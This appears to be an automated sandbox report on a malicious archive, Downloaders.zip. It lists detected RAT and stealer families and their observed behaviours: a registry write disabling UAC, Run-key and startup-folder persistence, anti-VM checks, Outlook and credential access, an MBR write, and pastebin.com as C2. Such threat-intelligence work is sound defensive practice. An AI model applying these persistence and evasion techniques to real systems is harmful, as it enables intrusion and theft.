Analysis Overview
SHA256
16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
Threat Level: Known bad
The file Downloaders.zip was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Gurcu, WhiteSnake
Xworm
Quasar payload
Quasar family
RedLine
njRAT/Bladabindi
RedLine payload
AsyncRat
Njrat family
Suspicious use of NtCreateUserProcessOtherParentProcess
SystemBC
Asyncrat family
Gurcu family
Suspicious use of NtCreateProcessExOtherParentProcess
Systembc family
Quasar RAT
UAC bypass
Xworm family
Redline family
Async RAT payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Sets service image path in registry
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Boot or Logon Autostart Execution: Active Setup
Disables Task Manager via registry modification
Modifies Windows Firewall
Drops file in Drivers directory
Reads user/profile data of local email clients
Drops startup file
Reads user/profile data of web browsers
Loads dropped DLL
Identifies Wine through registry keys
Executes dropped EXE
Indicator Removal: Clear Windows Event Logs
Reads WinSCP keys stored on the system
Checks BIOS information in registry
Event Triggered Execution: Component Object Model Hijacking
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Writes to the Master Boot Record (MBR)
Checks installed software on the system
Adds Run key to start application
Enumerates connected drives
Installs/modifies Browser Helper Object
Accesses Microsoft Outlook profiles
Legitimate hosting services abused for malware hosting/C2
UPX packed file
Enumerates processes with tasklist
Drops autorun.inf file
Suspicious use of SetThreadContext
Detected potential entity reuse from brand MICROSOFT.
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Sets desktop wallpaper using registry
Drops file in Windows directory
Drops file in Program Files directory
System Network Configuration Discovery: Wi-Fi Discovery
Event Triggered Execution: Netsh Helper DLL
Browser Information Discovery
Unsigned PE
Enumerates physical storage devices
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Internet Connection Discovery
Program crash
Delays execution with timeout.exe
Suspicious use of UnmapMainImage
Checks processor information in registry
Modifies data under HKEY_USERS
outlook_office_path
Suspicious use of SendNotifyMessage
outlook_win_path
Runs ping.exe
Scheduled Task/Job: Scheduled Task
NTFS ADS
Modifies registry key
Enumerates system info in registry
Modifies registry class
System policy modification
Views/modifies file attributes
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Opens file in notepad (likely ransom note)
Modifies system certificate store
Suspicious behavior: LoadsDriver
Suspicious behavior: MapViewOfSection
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Modifies Internet Explorer settings
Checks SCSI registry key(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2025-02-13 04:24
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-02-13 04:24
Reported
2025-02-13 04:46
Platform
win11-20250211-en
Max time kernel
1152s
Max time network
1306s
Command Line
Signatures
AsyncRat
Asyncrat family
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gurcu family
Gurcu, WhiteSnake
Njrat family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4872 created 5332 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Desktop\Files\TPB-1.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
SystemBC
Systembc family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Xworm
Xworm family
njRAT/Bladabindi
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\Files\random.exe | N/A |
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Version = "43,0,0,0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\ = "Microsoft Edge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\StubPath = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Localized Name = "Microsoft Edge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\IsInstalled = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Disables Task Manager via registry modification
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Program Files\ProcessMonitor\Procmon64.exe | N/A |
| File opened for modification | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Users\Admin\AppData\Local\Temp\Procmon64.exe | N/A |
| File created | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Users\Admin\AppData\Local\Temp\Procmon64.exe | N/A |
| File opened for modification | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Program Files\sysint\Procmon64.exe | N/A |
| File created | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Program Files\sysint\Procmon64.exe | N/A |
| File opened for modification | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe | N/A |
| File created | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe | N/A |
| File opened for modification | C:\Windows\system32\Drivers\PROCMON24.SYS | C:\Program Files\ProcessMonitor\Procmon64.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCMON24\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCMON24.SYS" | C:\Program Files\ProcessMonitor\Procmon64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCMON24\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCMON24.SYS" | C:\Users\Admin\AppData\Local\Temp\Procmon64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCMON24\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCMON24.SYS" | C:\Program Files\sysint\Procmon64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCMON24\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCMON24.SYS" | C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\Files\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\Files\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\Desktop\Files\XClient.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\Desktop\Files\winlog32.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DriverUtil.vbs | C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\Desktop\Files\Fast%20Download.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\Desktop\Files\XClient.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Wine | C:\Users\Admin\Desktop\Files\random.exe | N/A |
Indicator Removal: Clear Windows Event Logs
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A |
Reads WinSCP keys stored on the system
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\bnkrigkawd.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\svhost = "\"C:\\Users\\Admin\\AppData\\Roaming\\KDOT\\PerfWatson1.exe\"" | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\SystemHandler = "C:\\ProgramData\\Winsrv\\winsvc.exe" | C:\Users\Admin\AppData\Local\Temp\temp_16933.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\adbabbcfdbc = "\"C:\\ProgramData\\adbabbcfdbc.exe\"" | C:\Users\Admin\AppData\Local\Temp\temp_16943.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\adbabbcfdbc = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\temp_16943.exe\"" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\Desktop\\Files\\networkmanager.exe" | C:\Users\Admin\Desktop\Files\networkmanager.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Subsystem Framework = "\"C:\\ProgramData\\Microsoft Subsystem Framework\\winmsbt.exe\"" | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\Desktop\\Files\\networkmanager.exe" | C:\Users\Admin\Desktop\Files\networkmanager.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\Desktop\\Files\\networkmanager.exe" | C:\Users\Admin\Desktop\Files\networkmanager.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" | C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77Security = "C:\\Users\\Admin\\AppData\\Roaming\\$77Security.exe" | C:\Users\Admin\AppData\Local\Temp\$77Security.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\adbabbcfdbc = "\"C:\\ProgramData\\adbabbcfdbc.exe\"" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" | C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" | C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" | C:\Users\Admin\Desktop\Files\XClient.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" | C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Software\Microsoft\Windows\CurrentVersion\Run\SystemHandler = "C:\\Users\\Admin\\AppData\\Local\\Temp\\temp_16933.exe" | C:\Users\Admin\AppData\Local\Temp\temp_16933.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Installs/modifies Browser Helper Object
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PHYSICALDRIVE0 | C:\Users\Admin\Desktop\Files\random.exe | N/A |
Detected potential entity reuse from brand MICROSOFT.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File created | F:\autorun.inf | C:\Users\Admin\Desktop\Files\856.exe | N/A |
| File opened for modification | F:\autorun.inf | C:\Users\Admin\Desktop\Files\856.exe | N/A |
| File created | C:\autorun.inf | C:\Users\Admin\Desktop\Files\856.exe | N/A |
| File opened for modification | C:\autorun.inf | C:\Users\Admin\Desktop\Files\856.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\svhost | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Discord | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\ctfmon | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\$77Security | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\$77svchost | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\StUpdate | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Test Task17 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
